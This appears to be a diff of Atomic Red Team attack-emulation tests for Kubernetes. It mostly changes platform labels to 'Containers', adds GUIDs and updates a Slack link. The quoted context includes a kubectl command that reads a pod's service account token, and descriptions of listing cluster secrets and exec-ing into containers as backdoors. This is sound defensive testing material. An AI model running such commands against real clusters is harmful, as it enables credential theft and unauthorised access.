@@ -16,7 +16,7 @@ An adversary may access the Docker API to collect logs that contain credentials
 ## Atomic Test #1 - ListSecrets
 A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services.

-**Supported Platforms:** macOS, Linux
+**Supported Platforms:** Containers


 **auto_generated_guid:** 43c3a49d-d15c-45e6-b303-f6e177e44a9a
@@ -6,8 +6,7 @@ atomic_tests:
  description: |
    A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services.
  supported_platforms:
-  - macos
-  - linux
+  - containers
  input_arguments:
    namespace:
      description: K8s namespace to list
@@ -22,7 +21,7 @@ atomic_tests:
    elevation_required: false

 - name: Cat the contents of a Kubernetes service account token file
-  auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f
+  auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f
  description: |
    Access the Kubernetes service account access token stored within a container in a cluster.
  
@@ -76,4 +75,4 @@ atomic_tests:
      kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token
    name: sh
    cleanup_command: |
-      kubectl --context kind-atomic-cluster delete pod atomic-pod
+      kubectl --context kind-atomic-cluster delete pod atomic-pod
@@ -14,7 +14,7 @@ In Docker, adversaries may specify an entrypoint during container deployment tha
 ## Atomic Test #1 - ExecIntoContainer
 Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”.

-**Supported Platforms:** Linux, macOS
+**Supported Platforms:** Containers


 **auto_generated_guid:** d03bfcd3-ed87-49c8-8880-44bb772dea4b
@@ -6,8 +6,7 @@ atomic_tests:
  description: |
    Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”.
  supported_platforms:
-  - linux
-  - macos
+  - containers
  input_arguments:
    namespace:
      description: K8s namespace to use
@@ -26,4 +25,4 @@ atomic_tests:
    cleanup_command: |
      kubectl delete pod busybox -n #{namespace}
    name: bash
-    elevation_required: false
+    elevation_required: false
@@ -18,7 +18,7 @@ Additional Details:
 - https://twitter.com/mauilion/status/1129468485480751104
 - https://securekubernetes.com/scenario_2_attack/

-**Supported Platforms:** Linux
+**Supported Platforms:** Containers


 **auto_generated_guid:** 0b2f9520-a17a-4671-9dba-3bd034099fff
@@ -12,7 +12,7 @@ atomic_tests:
    - https://twitter.com/mauilion/status/1129468485480751104
    - https://securekubernetes.com/scenario_2_attack/
  supported_platforms:
-  - linux
+  - containers
  
  dependency_executor_name: sh
  dependencies: 
@@ -732,3 +732,10 @@ c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08
 b8e747c3-bdf7-4d71-bce2-f1df2a057406
 a12b5531-acab-4618-a470-0dafb294a87a
 d400090a-d8ca-4be0-982e-c70598a23de9
+54a4daf1-71df-4383-9ba7-f1a295d8b6d2
+d0eb3597-a1b3-4d65-b33b-2cda8d397f20
+a538de64-1c74-46ed-aa60-b995ed302598
+8b3f4ed6-077b-4bdd-891c-2d237f19410f
+49eb9404-5e0f-4031-a179-b40f7be385e3
+1b72b3bd-72f8-4b63-a30b-84e91b9c3578
+8707a805-2b76-4f32-b1c0-14e558205772
@@ -31,7 +31,7 @@
    <a href="apis" class="btn">APIs</a>
    <a href="related" class="btn">Related</a>
    <a href="{{ site.github.repository_url }}" class="btn">View on GitHub</a>
-    <a href="https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link" class="btn">Join on Slack</a>
+    <a href="https://slack.atomicredteam.io/" class="btn">Join on Slack</a>
 </section>

 <section class="main-content">